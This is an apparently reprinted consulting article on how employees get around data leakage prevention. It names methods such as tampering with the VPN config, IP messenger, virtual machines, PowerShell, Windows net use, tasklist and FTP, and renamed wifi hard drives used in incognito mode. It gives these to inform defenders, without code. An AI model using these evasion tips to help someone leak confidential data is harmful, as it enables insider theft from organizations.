Data leakage is a serious threat to organizations, as it can lead to significant financial losses and compromised security. In recent times companies have implemented data leakage prevention (DLP) measures to prevent both outsiders and insiders from gaining unauthorized access to data.
There are several reasons why DLP measures are focused on insiders as a risk. First, it can be difficult to detect and prevent data breaches when they are carried out by employees who have legitimate access to company systems and data. Second, insiders may have motivations for breaching security protocols, such as financial gain, dissatisfaction with their job, or personal grievances.
As companies are investing more resources in their data leakage prevention (DLP) measures, some tech-savvy employees have found ways to bypass these security protocols. By leveraging their technical knowledge and experience with software, these workers can evade the restrictive measures put in place by their employers. This creates a major challenge for cyber security teams, who must continuously adapt their strategies to stay ahead of the curve.
Those employees who are not tech-savvy are also relying on online video sites and social media to learn these tricks. Here are some techniques that employees are using to copy confidential data without getting detected:
- Tampering company VPN Client: One way that employees can do this is through the use of virtual private networks (VPNs). VPNs allow users to create a secure, encrypted connection to another network. This means that employees can connect to an unauthorized VPN server by tampering with the VPN configuration file and using the company-provided VPN Client to access cloud storage sites.
- Using file-sharing applications: Another way that some employees are bypassing DLP measures is through the use of file-sharing applications. These platforms make it easy for users to share files and folders, even large ones with sensitive data, without putting them at risk. While these applications can be blocked by companies, tech-savvy employees know how to find ways around these restrictions as well. One such application is called IP messenger.
- Using virtual machines: One way that some employees can steal or leak data from their company is through the use of virtual machines. Virtual machines are software programs that allow users to create an independent, temporary operating environment on their computer. By using a virtual machine, an employee can sneakily access sensitive data on their company’s network without being detected. In some cases, they may even be able to copy or download this data onto the virtual machine, putting it at risk of being leaked externally.
- Powershell: Powershell is a popular scripting language that can be used to automate various tasks. It can also be used to steal data, as it allows users to run commands on remote computers. This means that an attacker could use Powershell to remotely access a company’s network and steal sensitive data. They could then exfiltrate this data off the network using a variety of methods, including uploading it to cloud storage services or sending it via email.
- Windows commands: In-built windows commands can be used to steal data by an attacker in several ways. For example, the “net use” command can be used to map a network drive. This would allow an attacker to access data on a remote computer as if it was stored locally. Another way that attackers can use in-built windows commands to steal data is by using the “tasklist” command. This command displays a list of all the running processes on a computer. By using this command, an attacker can see which processes are accessing sensitive data and then use that information to steal the data. Windows machines also have an inbuilt FTP client that can be used to upload confidential data to an external FTP server.
- Wifi-enabled hard drives: Wifi hard drives can be used to steal data by an employee in several ways. One way is by connecting the wifi hard drive to a computer and then accessing it via the browser. This would allow an employee to upload sensitive data from the computer onto the wifi hard drive without creating a significant amount of logs when the browser is in incognito mode and the Wifi name of the hard drive can be renamed to an unsuspecting name. This technique will also bypass measures around USB device usage.
As companies become increasingly dependent on technology, it is no surprise that tech-savvy employees are finding ways to bypass company data leakage prevention measures. To address this issue, companies need to focus on educating their employees about the importance of data security, as well as fine-tune their DLP solutions that can detect and prevent sensitive data from being accessed or leaked by unauthorized users. In particular, companies should consider adopting solutions that take an integrated approach to data protection. This means that the solution not only detects and prevents data leakage but also provides visibility into which employees are accessing sensitive data and what they are doing with it. Only by taking a holistic approach to data security can companies hope to keep their sensitive data safe from the prying eyes of tech-savvy employees.
Reproduced with permission from The Times of India. Read the full article here.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.